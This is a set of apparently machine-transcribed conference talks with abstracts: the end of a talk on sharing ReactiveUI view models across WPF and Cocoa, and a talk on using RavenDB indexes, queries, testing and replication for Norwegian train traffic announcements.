But like, I made this message box pop up if you hit the OK button. But it's super boring. You can see it's right or not right really quickly. That's the idea. So any questions, comments, ranks? This sucks. It's awesome. Any opinions? So you tied to get this, right? So you tied to get the view and the view model with bindings. So that's, we're binding commands and we're binding properties. They're the two interesting things that we're connecting together. And so we can also run custom code. So I can say like, whenever the view model changes do something, right? So like WinAny.subscribe, which would be an RX thing. So I can do, I can run arbitrary code in the view. And then certain, you know, certain code belongs in the view, right? Like things like focus or scrolling, scroll position, is all view related things. So you'd have to do that in the view, right? This approach is also really interesting. So for example, this is always a problem in MVVM, right? Is that you want to do something, you want to, you register a command in the view model, but that command really does a view related thing, right? Like showing a message box. You wouldn't want to show a message box in a view model because you can't, it's untestable, right? And so people who do MVVM always end up with jumping through hoops like weird kind of things to try to get around this. But in React to UI, it's really easy because commands themselves are events, right? They're I observables. I can subscribe to them. So I could have the OK button in the view model, in this case does nothing, right? But in the view, it pops the message box, right? So oftentimes in React to UI, you'll find you're defining things that in the view model do nothing, right? But they're only a view related thing. But you can still test it because I can pretend to hit the OK button and make sure there was hit in the unit test runner. So it's a brief introduction to Coco. I'm going to try to teach you all of Coco in like five minutes. Get ready. So Nibs or they have the extension XIB, but if you call them Zibs, then people laugh at you in the Coco world. So you have to call them Nibs. Nibs are just like XAML files, really. XAML files, if you really think about what they really are, it's just like a serialized list of objects, right? It's objects and a bunch of properties and it's going to set up those properties when the XAML file is loaded, right? So when Nib file is the same thing, right? It's a set of objects and then when it calls this method, it's going to load all those objects and then set them up for you, right? And then just hand them to you. So the framework reads them, reads this Nib file or XAML file, creates the object and then hands it to you. So instead of controls having events, they have an object that receives the event. That's called a delegate. And so it's really confusing because.NET and Coco use the same terms but mean different things like what they call a protocol. They mean an interface and when they say interface, they mean class. It's very confusing. So what that means is instead of you having a button and that button having a clicked event, you provided this object called delegate which is kind of an interface, like a.NET interface and that object has a method called clicked, right? Does that make sense? So you handed an object with a bunch that is essentially your list of event handlers, right? And then the button will call that object. So they use this pattern called MVC which is the way that they do MVC is not ideal. 
Let me show you why. So these are all quotes directly from the Apple documentation. So controller objects are conduit through which view objects learn about changes in model objects and vice versa. That sounds pretty cool. Controller object interprets user actions and communicates new or changed data in model. When model object change, a controller object communicates a new model data to the view objects so that they can display it. I'm feeling it. Controllers directly reference UI controls through outlets to fiddle with their contents. We were so close. So the problem is that Cocoa controllers, now if you're good with Cocoa you can get around this, but by default Cocoa controllers will directly edit text like UI controls. So they're not testable, right? You can't new up a controller in a test runner and then play with it, right? Because it will demand to create Cocoa objects and those Cocoa objects will freak out because they're not in a real window. So the C in MVC, at least in Cocoa, you treat like the XAML code behind, right? So you just write, you pretend that that's view code and you write only view stuff in there. So that's in reactive UI. That's where we're going to put all our bind calls and our one-way bind calls. So how could we take MVVM and apply it to Cocoa? It turns out we have a project that kind of proves that that's true. So this is GitHub for Mac. So GitHub for Mac, these days is written in an MVVM style using an MVVM framework called reactive Cocoa, which is kind of the objective C version of reactive UI. It's super exciting that they actually ported all of the reactive extensions and reactive UI into one library. And so they use it and they use MVVM too. So they have unit tests of UIs and get the same benefits. It's very cool. It's very cool that GitHub for Windows and GitHub for Mac are written in two completely different languages and two completely different platforms yet are philosophically written the same way. I'm kind of excited about that. So let's prove it. Go away Visual Studio. We're going to fast forward. This is the wrong project. So this time I must confess I had to cheat a little bit because I had to modify the view model to make this work by a bunch of hash of monos. So the thing is that your view model might not be 100% portable, but it's pretty close. I unfortunately picked a terrible example because it's all images and colors, the two least portable things on the planet. Apparently every UI framework has decided that they are not, everyone else is wrong about how to define red, green, blue and alpha and they need to define themselves. The other thing is on Windows we used the HB client but that doesn't exist until recently on Xamarin.Mac. So I had to use RESTsharp. So I had to rewrite that code. So you'll see a big ifdef. This code is magical. Don't worry about it. Yes, it's magical. But a lot of the same things still happen. This Winini is the same. This is mostly the same where I do this crazy, crazy selection to select a color into a list of images. So let's look at the interesting part. So every most Nib files will end up with the Nib file and the controller file, the controller for that view. So it's the main Winini controller. You see the default things. Away from Nib is where we write all of the same kind of code. We're writing bindings. I had to do similar tricks to make React to UI understand Coco. Although Coco is a platform I want to support so it will actually in React to UI 5 not need nearly as many of these hacks. 
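A sketch of what that Cocoa controller-as-code-behind can look like with Xamarin.Mac (MonoMac at the time) and ReactiveUI. Everything here is illustrative: the class, outlet and view model names are invented, the namespaces depend on which Mac toolchain you use, and, as he says, extra binding registrations were needed before ReactiveUI understood Cocoa controls out of the box.

using System;
using MonoMac.AppKit;       // Xamarin.Mac builds use the AppKit/Foundation namespaces instead
using ReactiveUI;

// Treated like XAML code-behind: only boring, mechanical wiring lives here.
public partial class MainWindowController : NSWindowController, IViewFor<MainWindowViewModel>
{
    public MainWindowController(IntPtr handle) : base(handle) { }

    public override void AwakeFromNib()
    {
        base.AwakeFromNib();
        ViewModel = new MainWindowViewModel();

        // Outlets like RedField and OkButton come from the nib; the binding calls
        // are the same shape as in the WPF and WinForms versions of the app.
        this.Bind(ViewModel, vm => vm.Red, v => v.RedField.IntValue);
        this.BindCommand(ViewModel, vm => vm.Ok, v => v.OkButton);
    }

    public MainWindowViewModel ViewModel { get; set; }
    object IViewFor.ViewModel
    {
        get { return ViewModel; }
        set { ViewModel = (MainWindowViewModel)value; }
    }
}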
So the hacks are like, for example, detecting on an NSTextField when the text has changed, which is apparently a non-trivial endeavor. Which you'd think it wouldn't be, but apparently. NB, nota bene, Cocoa is weird: to create like a border that had a background, I had to create a Core Graphics layer and change a layer. It was weird. But the point is this is all view specific code. It's not my view model. I didn't have to clutter my view model with these very view related concerns. So the cool thing is in Objective C, in Cocoa, I was able to do the image loading. This is zero. So the OK button will also gray out, right? When I typed in a garbage value. And this is pretty cool. I'm not smart enough to do this at all. But this comes for free with this NSCollectionView. Snazzy. So what I mean is to share the same view model between them, right? Mostly. And it turns out you can do this on like pretty much every platform. Like I've worked on just starting Android support. And it works as well there. It's very cool. So that's all I've got. GitHub slash reactiveui is ReactiveUI. ReactiveCocoa is at the same place, only replace the word UI with Cocoa. My name is xpaulbettsx on Twitter because back in high school that was cool and now it's not and I have infinite regret. So yeah, questions, comments? Android works there too. So just on the plane flying over here, I got the unit test runner running on Android and they almost all passed. So on Android, a lot of the nice features that are present in ReactiveUI on other platforms aren't there yet. So like for example, ReactiveUI is good at binding to lists, like items controls. And on Android you should be able to do that too but we're not quite there yet. So, but you can certainly write this code yourself. It's kind of like just convenience things that are missing. So. Yeah, yeah. So if you're doing, if you're just like doing line of business applications, you're loading stuff from a database, you're like saving it to, you know, a cache or whatever, all that stuff can be shared. And that's really, really interesting. So especially, so I write this other library called Akavache. And Akavache is a library for, it's kind of like memcached for desktop applications. So like anything you download, you throw it into a cache and then you act as if you're always fetching things from the network but it like goes faster once it's cached, right? Like so. And it's all asynchronous. It's, you know, it's designed for desktop and mobile applications because I couldn't find any library like it; caching is all web. Every interesting library is on the web these days, you know. Nobody writes desktop applications anymore. Yeah, so they're all free. They're all free and open source. So you can always crack open the code and take a look. So with that you can write cross-platform serialization of state, right? Like loading and saving state, loading, you know, and saving stuff you got from the network. And so that makes it so you can really reuse a lot of your application logic if you can have cross-platform state basically. Say it again. Yeah. Yeah, so that is supported everywhere except for Android where it's very hard to do view model based routing. So routing, for example, you can say like, I'm on a page and you can say like, go to this view model and then some code in ReactiveUI looks up the view associated with that view model, right?
So you just say I want to go to login view model and then it says like, okay, let me find a view that fits, right? So yeah, that works on Cocoa and iOS. And iOS even has a built-in navigation controller that follows around the view models. So like navigation controller is the standard like bar at the top with the back button and the alternate button. And so, and it works great on Windows Phone and Windows applications too. So yeah, routing was a thing that I didn't mention in view location. So for example, so the idea is that you just put a generic control on the screen and then say like, here's the view model and then it'll look up a view associated with that view model, right? And then move between them. It's really useful for lists because then you just provide it a list of view models and it's like, okay, let me display, figure out the views that go inside these tiles, right, in a list. I know, it aims control for example. So it means that your views become almost even more boring because it's only the content. You don't have any like dummy views that are just like, hold the list box, right? Cool. All right. Well, thank you so much for your time. I'm sorry that it's not DDD in CQRS but I hope it was so interesting. Yeah, thank you so much.
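For reference, the Akavache fetch-or-cache pattern mentioned in the Q&A looks roughly like this. The API shape is from memory and varies a little between Akavache versions; FetchProfileFromNetwork and UserProfile are invented placeholders, and session context (a method body with those helpers in scope) is assumed.

using System;
using System.Reactive.Linq;
using Akavache;

// Ask the cache first; if the key is missing (or expired) the fetch function runs,
// the result is stored, and from then on the same call "goes faster once it's cached".
IObservable<UserProfile> profile = BlobCache.LocalMachine.GetOrFetchObject(
    "user-profile",
    () => FetchProfileFromNetwork(),            // assumed helper returning IObservable<UserProfile>
    DateTimeOffset.Now.AddHours(1));            // optional expiration

profile.Subscribe(p => Console.WriteLine("Hello, " + p.Name));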
|
In this talk, learn how to use the Model-View-ViewModel pattern to write testable user interfaces on platforms beyond XAML-based ones. With ReactiveUI, an MVVM Framework that is designed for cross-platform applications, you can see how to write ViewModels that run on iOS, Android, and Windows, while still creating native experiences on each platform. Specifically, we’ll dive into Cocoa / AppKit, and see how to wire up ViewModels to Cocoa Views and ViewControllers, using the same syntax as in a WPF application, providing an amazing potential for code reuse in cross-platform environments.
|
10.5446/51489 (DOI)
|
So, I think it's about time to start. Welcome to everyone. Nice to see that there are so many here. So my talk is running with Ravens and nobody is surprised to hear that that will include RavenDB. Great. So, a little bit about me. My name is Pei Fruller Pedersen. I work at Buve as a solution architect. So I build software systems and I'm going to talk about one of the systems we have built today. So, a little bit of contact information if somebody wants to get in touch with me afterwards. Okay. So let me just quickly start by telling you about what we're building. So, can anyone see something that's out of place in this picture? Something not supposed to be there? So, this is 60s technology and an iPad. So, the system we're building is here. So, we're building a system for publishing train traffic announcements. This is a system for the Norwegian directorate of railway services called Järnbanverke for all Norwegians here, which is everyone. So, I guess most of you know that Järnbanverke is building infrastructure and then we have a lot of train companies running trains on that. So, one example of what we're doing is distributing train routes to train drivers or a list of trains passing through a train station and so on. There's a lot of things happening on the tracks. You can have speed reductions, you can have power disconnections, you can have track work running quite frequently. So, all this information needs to be sent to everybody's working on the tracks. So our scenario is that we are supposed to build a portal for announcing up to 2,000 trains a day. That's every train running on the Norwegian rails every day. We need to announce all the infrastructure changes and all the track work. And we need to tell about this to the train drivers to notify between the different train dispatch central to the station manager and to the railway companies who own the trains. So, I'll try to illustrate one of the difficult things we have to solve here. So, here's an example of two trains. There's train L3, local train and there's train 5510, which is a freight train. So, what we need to get from the system is the driver of train L3 needs to know about all the stations he's running through. The driver of train 5510 needs to know about all the stations he's running through. The station manager at Rua station needs to know about all the trains passing his station. VMA station, for those who know their local geography, belongs to Bergen dispatch central. These stations belong to Drummond dispatch central. So, everything passing through there needs to be notified to Drummond dispatch central. And this great purple, big purple section is stations belonging to Oslo dispatch central area. So, so far so good. Some different roles needs to know about different parts of the train as it passes through. So, let me add a little bit of complexity. There is speed reduction at Rua station. So, now we need to know, now the train L3 driver needs to know about this. The driver of train 5510 needs to know about this and the station manager at Rua station needs to know about this. But we don't want to tell this to, sorry, Oslo dispatch central area needs to know about this. But we don't want to tell about it to the Bergen dispatch central because it's not relevant for them. So, we try to protect them from information they don't need to know. Same with Drummond dispatch central area is not involved in this happening. So, we want to filter it out of their scope as well. 
So, this is one of the problems we needed to solve in this case. So, we made a list of the things we needed for a system that could handle all these things via portal complex query logic and so on. So, and we decided what we need is something that can help us work fast and effective. So some kind of data store that we can store our trains in and to be able to store them into the portal. And we needed something that was optimized for reading because this is a 99% read scenario. We needed something that could handle quite complex filtering logic and query logic. And we needed something with high availability support. So, this was our, this was the abilities we were looking for when we started to look at Raven. So, Raven is, as most of you know, a schema less database that stores its documents as JSON. You query it with link, which is a familiar syntax for most of the developers. And it has built in replication support which we could leverage. So, the architecture we tried to set up with RavenDB was something like this. So we have a registration system that handles announcements either through forms or imported from other systems, which we publish to our portal. So the publishing is going through a load balancer and hits one of two RavenDBs which have replication between them. So, and for each RavenDB instance, we have a web server instance that will, that pulls its data from the specific RavenDB instance. So this means that we have a quite easy setup. It's a lightweight web application. It pulls all its data from a local store on the actual web server. And the only data we keep on each web node is current data. So things we need to display here and now. Most of our data stored for historical reasons is in a SQL server over there. So that's also where we handle changes and updates and logs and stuff. So now I've presented our scenario and I want to show you some, how we solve some of the practical things. So down the rabbit hole or into the tunnel. I have three things I want to show you today. It is about how we solve the read optimized scenario, what abilities we were using and what abilities we chose not to use. I'll show you how we do a couple of queries that are not obvious. And I'll show you how we solve the high availability issue. And since this is announced as an intermediate talk, I will try to show you something in every demo that you won't get in a beginner level talk. And something that's not simple to read from the documentation. So I'll get to it. So the first scenario, the optimized for read scenario. This is partly handled with, by the way, you model your documents. So we model documents as a denormalized model. So everything we need for one train is in one document. So we can pull out the whole train route in one go. But after looking at the data for a while, we found that some of the data changed for different purposes. So that means that we do want to put some of the data out in different documents, despite wanting to denormalize most of it. So I'll show you a little bit about that in a while. Another important property of a document is the document ID. So every document has an ID which you can use to load the document. And that's really how you pull out existing documents from RavenDB. That means that you can reference one document from another document just by putting the ID of the other document in the first document. So to be able to support that, we've been thinking about how we model our IDs. 
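To make the modelling concrete, here is a hedged sketch of what such a denormalised train-route document and its domain-based ID convention could look like. The class and property names and the exact ID format are invented for illustration, not taken from the actual system.

using System;
using System.Collections.Generic;

public class TrainRoute
{
    public string Id { get; set; }              // e.g. "TrainRoutes/2013-06-14/1014"
    public string TrainNumber { get; set; }
    public DateTime Date { get; set; }
    public List<TrainStop> Stops { get; set; }  // the whole route lives in one document

    // Because the ID is built from facts that never change, any part of the system
    // can address the document directly without looking anything up first.
    public static string MakeId(DateTime date, string trainNumber)
    {
        return string.Format("TrainRoutes/{0:yyyy-MM-dd}/{1}", date, trainNumber);
    }
}

public class TrainStop
{
    public string StationId { get; set; }       // reference to a separate Station document
    public DateTime ScheduledArrival { get; set; }
    public Station Station { get; set; }        // left empty in the stored route; filled in after loading
}

public class Station
{
    public string Id { get; set; }               // e.g. "Stations/roa" (invented)
    public string Name { get; set; }
}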
So a difference from a traditional SQL Server database where you often use surrogate keys to be able to change things. We're trying really hard to use domain concepts in our IDs so that we have predictable IDs because that makes it easier for us to do updates later. We can change things from another part of the application because we know something about the train we're talking about. So for instance, a train route is modeled with the date and the train number in the ID because that's universal truth that never changes. So time for my first demo. So this is the basic, can everyone see this? In the back? This is a really long room so I'm not really sure. So this is how you load the document. We have set up a document session and I can do a load of a document type and provide an ID. So basic stuff. So I probably haven't started my RavenDB instance which I'm going to demo against. Let me do that first. I'm running Raven in debug mode here to get the output log so that we can go into the log and see what's happening in the RavenDB. Most of these are from Raven Studio. So Raven Studio looks like this where we have all the trains and we have collections of different types of announcements that we're providing to the train companies. I'll get more into that later. So when I'm loading a document, it looks somewhat like this. This part readable. So what you can notice here is that we have a station ID in a property and we have a station property which doesn't have a value. Station is something we modeled out of our domain because the details of a station is they will change. There's a database for them but it's not updated. The quality of the data isn't good and we know that there's a project to improve that data. So we know that this data will change for different reasons than the original train. So that's a reason for keeping that specific document out of this structure. So the way you can, the way we can add the details to this document is just to loop over all the train station process in the train route and load the document for each station by submitting the station ID. So if I do that, I'll get a new document where I have the station put in, station details merged into my original document or into my object, really. But what happens now is this. So I'm loading my train route but it's actually doing one request for each station on the route and that's not really optimized and indeed RavenDB protects you from doing that kind of mistakes. So say I had a train that was passing through 30 stations instead of 20 stations, small simulation here. What would happen then is that this query would actually fail because RavenDB doesn't allow more than 30 operations per query. So then you get a nice error message like this. Maximum number of requests allowed. So the way you solve this is by telling RavenDB when you load the document to include all the station details in the same query. So that looks like this. And here's a small trick that you will have, that is not obvious in the documentation because I'll just run it so I can show you. Because what I'm now doing is I have the station details ID represented in a collection in my document so it's one level down. So the include command supports lambda expression where you can set up properties but you cannot give it subpaths to documents in a child collection. So that's what this common notation does. So my bad. If I'm selecting something in this window I'm actually blocking the RavenDB process. Beware of that when you do RavenDB in debug mode. 
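A sketch of the two approaches he contrasts: the naive per-station loads versus a single Load with an Include path. This assumes the RavenDB 2.x-era client API, an open IDocumentSession called session, and the invented document shape from the earlier sketch; the comma in the include path is the syntax for following a reference inside each element of a child collection.

// Naive version: one extra request per station, and a session is capped at 30
// requests, so a long route eventually throws.
var route = session.Load<TrainRoute>(TrainRoute.MakeId(new DateTime(2013, 6, 14), "1014"));
foreach (var stop in route.Stops)
    stop.Station = session.Load<Station>(stop.StationId);

// With Include: "Stops,StationId" means "for every element of Stops, also fetch the
// document its StationId points to", so everything comes back in a single request.
var included = session.Include("Stops,StationId")
                      .Load<TrainRoute>(TrainRoute.MakeId(new DateTime(2013, 6, 14), "1014"));
foreach (var stop in included.Stops)
    stop.Station = session.Load<Station>(stop.StationId);   // served from the session, no extra round trip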
So what you see when I do the include here, as you can see this is a recurrent property in a collection. So it happens many times. So this common notation solves that. And if I go back to the console you can see that it's actually doing just one query now where it's loading a document and including all my stations. Try not to do that mistake again. So okay. This works. Include. Yeah. So a little bit about a few different types of indexes. So indexes is how you get data out of RavenDB without knowing the ID of each document. So RavenDB has a search engine where it indexes some properties from each document and stores them in a Lucene index which you can query against. And that will pull out the document ID and Raven will load it in the background. But it's still loading by ID. It's just querying a Lucene index first. So I'll talk a little bit about the different types of indexes, how you query indexes and how we do testing on the indexes. First of all, some of you may have seen the RavenDB demos, like introduction demos. So what you'll know there is that they often don't add any indexes. They just put one or two documents in RavenDB and it will generate its own indexes based on the queries you're using. That works fine except that index creation in RavenDB is a really slow process. So when we put 500,000 documents into it here, the indexing would actually take in excess of 15 minutes. So for 15 minutes you would not get answers to your queries. That's really not how you want it. Especially if you lose your RavenDB service recycle for some reason, then you would lose the index and it would have to start rebuilding it again. So those dynamic indexes are really cool, but I would not recommend using them for a production system. So what you then do is you create the static index, which is a class that you deploy to a class definition with a link query and a map expression that you deploy to your RavenDB. So RavenDB will then convert that link expression to a Lucene index in the background for you. So from that expression you can actually calculate new values in the index and you can store these values only to the index and not to the document itself. So that gives you even more flexibility over on things you can query. And when you get back a query result, you can project the result to new types. So I'll show you a demo about that also in a second. Yeah. So next demo. There's going to be a bit of demos. So the next part is I'll show you quickly how to do a simple query. Another tip, quite often you'll see that the RavenDB query object called with this index has a string parameter in here. A lot of places in the documentation it's used like that. And if you use that syntax, you will lose out on refactoring support. You will also lose the ability to go and look at the index in a simple way just by navigating it. So navigating directly to the class. Here's an index, it has a map and the map contains a link expression which creates a new anonymous object and the result of this query will be stored to a Lucene index. So this is the simple query where we just query a specific index. And we give it our parameters and run it. So there's result will be something like this. This is a real query that we use in our application. This lists up all the trains passing through Honefo Station during the day. So this is the worksheet or work list for a station manager at Honefo Station. But in our application we have a lot of different types of announcements. 
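A hedged sketch of a static index like the one being described, plus a query that references the index by type rather than by a magic string. Index, class and field names are invented; the API shape is the RavenDB 2.x-era AbstractIndexCreationTask, and session is assumed to be an open IDocumentSession.

using System;
using System.Linq;
using Raven.Abstractions.Indexing;
using Raven.Client.Indexes;

// Deployed once (for example with IndexCreation.CreateIndexes at startup), so RavenDB
// never has to build it on the fly while requests are waiting.
public class TrainRoutes_ByStationAndDate : AbstractIndexCreationTask<TrainRoute>
{
    public TrainRoutes_ByStationAndDate()
    {
        Map = routes => from route in routes
                        from stop in route.Stops
                        select new
                        {
                            stop.StationId,
                            route.Date,
                            route.TrainNumber
                        };

        // Persist this value in the Lucene index itself so a query can project it
        // back out without loading the whole document.
        Store(x => x.TrainNumber, FieldStorage.Yes);
    }
}

// Querying by index type keeps refactoring support, unlike .Query("SomeIndexName"):
var today = DateTime.Today;
var todaysTrains = session.Query<TrainRoute, TrainRoutes_ByStationAndDate>()
                          .Where(r => r.Date == today)
                          .ToList();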
We have for a train you have the train route but you can also have cancellations. You can have partial cancellations connected to the train and a train can even be partially cancelled multiple times. So you can be cancelled in the beginning and in the end at the same time. So what we do then is we need to extract every document that is related to the train in some way. So that's what this interface is. So this implements different, we have different document types that implement the same interface. So by creating something called a multi-map index like this, where instead of a map expression you do add map. So you can add the query over the same, you can add an index which contains the same fields but from different document types. That means you can query over the same docus or you can query over different objects with the same properties. So if I run this demo, what you'll see here is that I'm doing one query and I get back a list. I'm doing one query with one train number and a date and I get back a list of objects which have different type. So these have different properties. I can do different things with them. So what I want to show you next is how we can take those different documents and project them to the same type because some users wants to know the differences between these document types and some wants an aggregated view. So for instance the train dispatch central, they need to see different documents presented in the same way. So what we do here is that we do the same query I just did but then we project the result to one type. So instead of setting up mapping of two different types and running that afterwards, we do that as part of the Raven query. So we'll get out. So if I run this query now, what I'll get out is a list of documents of the same type. And you can see here that they have a few common properties. So one thing I can do from here is that I can set values into the index. So what I'm doing here is I'm setting an announcement type which is the base document type. This is just to show how we can do calculations or calculate the fields and store them only in the index. So what I'm doing here is that I'm actually printing the announcement type out here but there's no value there. And that's because to use this, to make sure that this value is persisted, you actually need to specifically store it in the index. So if we're talking about the stock type. Store. So what I want to store is the index.t type. And that's field storage. Yes. Then I need to make sure that my indexes are regenerated. And regenerating indexes is something you often only do on deployment time because as I said earlier, index creation is quite a tough task. It takes a long time. So what you see now is that when I run this in this query, it returned but it didn't return any results. And that's because the indexing is still going on. Let me see here, so the way you can see it is down here. No, you can't see that. It's way down here. But the Raven Studio actually has a monitor of indexes and the indexing process and you can go there and see if any of the indexes are still. I'll show you more details about that when we get to the topic of testing indexes. So if I run this again, the index should be created and should be complete and I get back the same result. But now these properties are stored to the index and I can retrieve them as part of my projection. So, yeah. So I've shown you, you've seen a little bit of how we query the code in RavenDB already. 
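A sketch of the multi-map idea: one index fed by several document types that share the same fields, queried through a common interface. Again the types and names are invented, the API shape assumes the 2.x-era client, and session and date are assumed to be in scope; the projection and stored-field details he demos are only hinted at here.

using System;
using System.Linq;
using Raven.Client.Indexes;

public interface ITrainAnnouncement
{
    string TrainNumber { get; }
    DateTime Date { get; }
}

public class Announcements_ByTrain : AbstractMultiMapIndexCreationTask
{
    public Announcements_ByTrain()
    {
        // One AddMap per document type; they all emit the same index fields.
        AddMap<TrainRoute>(routes => from r in routes
                                     select new { r.TrainNumber, r.Date });

        AddMap<Cancellation>(cancels => from c in cancels
                                        select new { c.TrainNumber, c.Date });
    }
}

// One query, mixed result: TrainRoute and Cancellation instances side by side.
var everything = session.Query<ITrainAnnouncement, Announcements_ByTrain>()
                        .Where(a => a.TrainNumber == "1014" && a.Date == date)
                        .ToList();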
So you can query it with LINQ expressions, or if you have an advanced query which you cannot express with the LINQ syntax, you can go down to the Lucene API and query it using Lucene directly. If you do queries in Raven Studio, you always use the Lucene syntax. So to work effectively with RavenDB, you need to know the Lucene syntax. I'll show you a demo about that too. So here's an example. So as I told you earlier, we have a train dispatch central that needs to monitor parts of a section. And we have infrastructure changes that can happen at one station or between two stations, or they can span a list of sections which goes between many stations. So we need to know if any of the stations included in this infrastructure change hits any of the stations that we're currently monitoring. So this means that we need to find out from a query if one collection contains items which are in another collection. And to look into collections, RavenDB has a specific keyword, or LINQ extension, which is called In, but that takes a list. When we're querying against a list of strings, then this expects a list of strings. And indeed, there's really no way of expressing this particular query in the LINQ syntax. So let's just give up. And show how you can do it. So now we fall back to the Lucene syntax. And we do that by using a Lucene query instead of a normal query. This is a design decision. The Lucene query is not directly on the session object. It's in an Advanced property. So you're already notified that this is something advanced. This is an advanced feature. Don't use it if you don't know what you're doing. Another part of RavenDB is making sure that you understand what you're using this for. But when you get down to the Lucene syntax, there actually is a way of expressing this quite easily. When you supply a collection of strings to the In clause in Lucene, it will actually match items in each collection against each other. And then this suddenly became a really easy query to do. But once you've started a Lucene query, you need to complete it as a Lucene query. There's no mixing between Lucene and LINQ. So Lucene queries are, well, here's an example of the syntax. So you give a property and then a few special values. So here's a null value that actually is a value. And times need to be specified in this format. And you can do time intervals specified as an expression that ends in a star. So if I run this, I see that I have two infrastructure changes that match this particular section area. So I'll get a hit for those. I should probably demo that. But here's the Lucene query. You see the In syntax here. So you can't see that. Sorry. Can you read this text? No. I'll make it bigger. That better? Great. So here's the translation when you actually do the query. What you can actually do is just copy this into Raven Studio and run it there. So this is a way of debugging your code or your queries. Thank you. So the next subject on indexes is how we're testing them. RavenDB is designed to be really testable. The way they recommend that you do testing is that you host an embedded RavenDB in your tests. I've even heard that if you don't do it that way, somebody will yell at you. So yeah. So I'll show you how we set up our tests. First of all, all our Raven tests just inherit from a base test class, which does all the setup for us. So what this does is it sets up the embedded Raven store and instructs it to run in memory.
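The base test class he describes looks roughly like this: an embedded, in-memory store, the application's indexes deployed into it, and the consistency convention (which he gets to in a moment) so queries wait for the session's own writes to be indexed. The index type referenced here is the invented one from the earlier sketch, and the API names are from the RavenDB 2.x-era client.

using System;
using Raven.Client;
using Raven.Client.Document;
using Raven.Client.Embedded;
using Raven.Client.Indexes;

public abstract class RavenTestBase : IDisposable
{
    protected readonly IDocumentStore Store;
    protected readonly IDocumentSession Session;

    protected RavenTestBase()
    {
        Store = new EmbeddableDocumentStore
        {
            RunInMemory = true,                       // nothing touches disk; fresh store per test
            Conventions =
            {
                // Queries in a session wait until that session's own writes are indexed,
                // so tests don't race the background indexer.
                DefaultQueryingConsistency = ConsistencyOptions.QueryYourWrites
            }
        }.Initialize();

        // Deploy the same static indexes the application uses.
        IndexCreation.CreateIndexes(typeof(TrainRoutes_ByStationAndDate).Assembly, Store);

        Session = Store.OpenSession();
    }

    public void Dispose()
    {
        Session.Dispose();
        Store.Dispose();
    }
}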
And then, since this embedded store is created for every test, we need to deploy all our indexes. And then we open a session that we can use in the test. So once we get to the test, we have an empty RavenDB, which we need to preload with the data we need for our test. So what we do then is we create the documents that we need to store in RavenDB, store them there and save the changes. And we're ready to start our test. So here I'm just doing a simple query in the test. But what we normally do is to call our controllers or other services that use Raven sessions directly and just give them the test session that we've created. So this means that we can do quite big scenario tests without faking too much; we're actually running it on a real RavenDB. So if I run this test now, I've added the document, I've created a session and I query it and I get nothing. So why is that? That's because the indexing takes a while. If you have one index, you probably won't notice this because the index isn't that slow. But once you get to 20 indexes or more, then this is something that will happen in your tests. So what we do then is to make sure that this document that we stored in the setup has been indexed before we start running our tests. I'll show you how you can check for this first. In a query, I can add statistics so that RavenDB will tell me something about the query I'm doing. And if I print that statistic, like this, I can have it tell me if the index is stale or not. So if I'm running that, it will tell me that the index was stale, so I need to wait more. So there's a way I can do that for all tests. I can set up a query consistency convention. So what this does is it instructs RavenDB to make sure that everything I've written to RavenDB is indexed before returning results for any queries I do in the same session. So I add this to my document store and rerun the test. And now the test will take a little bit longer because it will wait for the index to be non-stale. So here it's non-stale and it's ready to run. It's still pretty fast. Yeah. So it's not a big delay. And by doing it this way, instead of writing a loop that waits for the index to become non-stale, it's actually RavenDB itself that determines whether the index is non-stale and returns control to you. So it's more transparent. Okay. So the last scenario we were looking at is how do we do high availability. So as I mentioned in the architecture, what we're doing is we're setting up two web nodes where we make RavenDB replicate between the nodes. So each Raven instance is always updated with the latest information. That means that we can just add a new server, set it up as a replication target, and it's ready to be used. One thing to be aware of is that when you have replication, you will have conflicts. So they need to be handled. So what we're trying to do here is to solve all our conflicts with domain rules. So we have very few writes. And since we're refreshing our view quite frequently in the short while after each write, if a write fails because of a replication conflict, we will actually throw away the change and refresh the view, and it will appear to the user as if the registration failed for some reason and he will need to redo it. So I'll show you quickly how we do that. So what I need to do then is to set up a new RavenDB server, and that's as simple as just unzipping a zip file and starting a new server instance. So this is a new RavenDB. What I need to do here is to add the database and add replication support.
Replication support is a creation-only setting. So you need to do that when you create the database. You can't add it later. So I've added the database. It's right now quite empty. So what I can do now is go back to my first database and add the replication setting to this one. So I'll set up the URL, put it here, specify the database name and save the changes like this. And so now I go here and look. This should pretty soon start to populate with documents. I hope. Save changes. Replication statistics. Yeah. So now you can see that the documents are trickling. Takes a bit of time. So while those documents are trickling in, what I can do is I can set up a new web application which is just a copy of the original one. And I can start that. So this is how we set up a new node to run the application. This is the RavenDB store and the web application. And once the RavenDB application is done migrating data, I can start using this application. So right now, if I do it like this, you can see that I have 11,000 documents and all my indexes are stale. So I might not get answers to the queries I'm doing. And since this indexing process takes quite a bit of time, I might not even get to where I'm to the point where it's updated and I can do queries against it during this session because I have something like 10 minutes to go. So I can, no stale. It's ready. So what I can do now is I can try to find the route for train number 1014, which is the one I used in my original demo. I can fetch that. So now I have a new node, replication set up and done. I'm already running it in another web instance. So setting up a new node in the portal is how much time did it take? Three minutes. So that's a... Now we have load balancing failover and we have a really fast way of setting up a new node if something should go down. So this sort of solves all our requirements for high availability. And now our little application is on the road with the trains. So to sum it up, RavenDB has been a really benefit to our development process. It's easy to set up. It's really easy and fun to use and my team is nodding down there so I'm pretty confident about what I'm saying here. It provides us with speed, power to do complex queries and failsafe support. And if we have wanted to build that ourselves for this kind of web scenario, we would have to do a lot of work. And it's really fun to work with. I have roughly five minutes to go if somebody has any questions. It's Friday afternoon and everyone is tired of a long... Yeah, sure. After replicating the database, change the document. What I didn't show her is that I would go to the new node and set up replication back so I would have a master and master replication scenario. So that means that if you change the document in either of the databases, it will update each other. Yeah. Yes? Anyone else? Okay. So to repeat, I am Peugeot de Pedersen. Thank you for joining me tonight. And have a nice day. Thank you.
|
What happens when you put all trains for an entire year into a document database? How can you find out where the trains are running, when they are scheduled to arrive at a stop, what trains are passing through a particular station? I will show you how we query across millions of train stops fast with high availability when data is stored in simple JSON documents. This talk will feature several advanced techniques such as mapping and reducing, indexing across documents, related documents and other features we use to make sure that trains can run on time.
|
10.5446/51490 (DOI)
|
